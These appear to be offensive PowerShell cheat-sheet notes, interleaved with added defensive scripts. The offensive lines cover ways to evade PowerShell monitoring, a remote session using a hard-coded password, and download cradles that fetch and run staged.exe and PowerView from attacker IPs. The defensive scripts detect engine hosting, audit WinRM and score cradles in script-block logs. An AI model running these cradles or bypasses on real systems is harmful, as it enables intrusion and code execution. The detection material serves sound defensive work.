Powershell

Bypasses for using powershell

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe # 32 Bit
    
Custom EXEs using the System.Management.Automation.dll
UnmanagedPowerShell
NotPowerShell
PSAttack  ## Can bundle in your own modules; very useful.
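Added example (not from the original notes): every bypass listed above works by hosting the PowerShell engine in a process that is not powershell.exe, so the defender's check is to look for processes that have loaded System.Management.Automation.dll (or its native image) under an unexpected name. The `$expectedHosts` list is an assumption for this snippet; extend it for tooling in your own environment that legitimately embeds the engine.

```powershell
# Added example, not from the original notes: hunt for processes that host the
# PowerShell engine outside powershell.exe, which is what the bypasses above
# (custom EXEs with System.Management.Automation.dll, UnmanagedPowerShell,
# NotPowerShell, PSAttack) rely on. Run elevated so other users' processes are readable.
# Assumption: the expected-host list is ours; extend it for your estate.
$expectedHosts = @('powershell', 'powershell_ise', 'pwsh', 'wsmprovhost')
# The engine loads as the IL assembly or its native image (.ni.dll), so match both.
$enginePattern = '^System\.Management\.Automation(\.ni)?\.dll$'

Get-Process | ForEach-Object {
    $proc = $_
    try {
        $engine = $proc.Modules | Where-Object { $_.ModuleName -match $enginePattern }
    } catch {
        return   # access denied / protected process / bitness mismatch: skip this one
    }
    if ($engine -and ($expectedHosts -notcontains $proc.ProcessName.ToLower())) {
        [pscustomobject]@{
            PID        = $proc.Id
            Process    = $proc.ProcessName
            Path       = $proc.Path
            EngineFrom = ($engine | Select-Object -First 1).FileName
        }
    }
}
```

This is a point-in-time sweep; for continuous coverage the same condition (image load of System.Management.Automation*.dll by a non-standard host) is what Sysmon Event ID 7 (ImageLoaded) lets you alert on.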

Enter-PSSession

Can have mixed results; documentation can be found here.

$password = ConvertTo-SecureString "PasswordPassword123!!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("remoteadmin", $password)
Enter-PSSession -ComputerName Remote01 -Credential $cred
[Remote01]: PS C:\Users\remoteadmin\Documents> whoami
whoami
Remote01\remoteadmin
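Added example (not from the original notes): the "mixed results" usually come down to the target's remoting configuration, so this snippet audits it from the host side: WinRM service state, listeners, which principals each session endpoint admits, and the client TrustedHosts list. Paths and cmdlets are standard WSMan/PSRemoting ones; the shape of the report is mine.

```powershell
# Added example, not from the original notes: audit the remoting surface of a host.
# Enter-PSSession only works when WinRM runs, a listener accepts the transport used,
# the caller is granted by an endpoint's permission set, and (for non-Kerberos logons)
# the client trusts the target. Checking these explains most "mixed results".
# Run from an elevated prompt; the WSMan: drive needs the WinRM service up.
$audit = [ordered]@{}
$audit['WinRMService'] = (Get-Service -Name WinRM).Status
# Listeners: which addresses and transports accept connections.
$audit['Listeners'] = Get-ChildItem WSMan:\localhost\Listener |
    Select-Object Name, @{ n = 'Keys'; e = { $_.Keys -join ',' } }
# Endpoints and their permission string: every principal listed here can open a session.
# Review anything beyond BUILTIN\Administrators and Remote Management Users.
$audit['Endpoints'] = Get-PSSessionConfiguration |
    Select-Object Name, PSVersion, Permission
# Client-side trust list; '*' means any host is accepted for NTLM/basic auth.
$audit['TrustedHosts'] = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
$audit
```

Note that the session above passes a plaintext password into a PSCredential; in anything other than throwaway lab notes, `Get-Credential` or a secret store keeps it out of the console history and script block logs.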

Useful one liners

Retrieve Local Administrators

[wmi]"Win32_UserAccount.Domain='$env:computername',Name='Administrator'" ## Retrieve the local Administrator account (the [wmi] accelerator resolves the WMI object path)

Download Cradle

(New-Object System.Net.WebClient).DownloadFile('http://192.168.49.143:8000/staged.exe', 'staged.exe')
iex (New-Object Net.WebClient).DownloadString('http://192.168.99.2:81/Tools/PowerView.ps1')
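Added example (not from the original notes): the two cradles above are exactly what PowerShell Script Block Logging (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) records verbatim, so a defender can score each logged block for download and execution primitives. The function, its severity scale and the `$sample` blocks are constructed for this example; the live-log query at the end assumes Script Block Logging is enabled.

```powershell
# Added example, not from the original notes: score PowerShell script blocks for
# download-cradle shapes. Pattern and severity scale are assumptions for this snippet.
$cradlePattern = '(?i)(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|FromBase64String)'

function Test-DownloadCradle {
    param([string]$ScriptText)
    $hits = [regex]::Matches($ScriptText, $cradlePattern) |
        ForEach-Object { $_.Value.ToLower() } | Sort-Object -Unique
    $download = $hits | Where-Object { $_ -match 'webclient|download|webrequest|iwr' }
    $execute  = $hits | Where-Object { $_ -match 'invoke-expression|iex|frombase64' }
    # A lone download call is ordinary admin scripting; download plus an execution
    # primitive in one block is the cradle shape, so rank it higher.
    $severity = 'None'
    if ($download) { $severity = 'Medium' }
    if ($download -and $execute) { $severity = 'High' }
    [pscustomobject]@{
        Severity   = $severity
        Indicators = ($hits -join ',')
        Text       = $ScriptText
    }
}

# Constructed sample blocks: the two cradles from these notes plus a benign admin line.
$sample = @(
    "(New-Object System.Net.WebClient).DownloadFile('http://192.168.49.143:8000/staged.exe', 'staged.exe')",
    "iex (New-Object Net.WebClient).DownloadString('http://192.168.99.2:81/Tools/PowerView.ps1')",
    "Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"
)
$sample | ForEach-Object { Test-DownloadCradle -ScriptText $_ } |
    Format-Table Severity, Indicators, Text -AutoSize

# Against the live log (Script Block Logging enabled, read access to the channel);
# for 4104 events Properties[2] is the ScriptBlockText field.
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { Test-DownloadCradle -ScriptText $_.Properties[2].Value } |
#     Where-Object Severity -ne 'None'
```

On the constructed sample the first block scores Medium (download only), the second High (download plus iex), and the admin line None; the keyword list is deliberately small and will miss obfuscated variants, which is why it belongs on top of script block logging rather than as a substitute for it.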
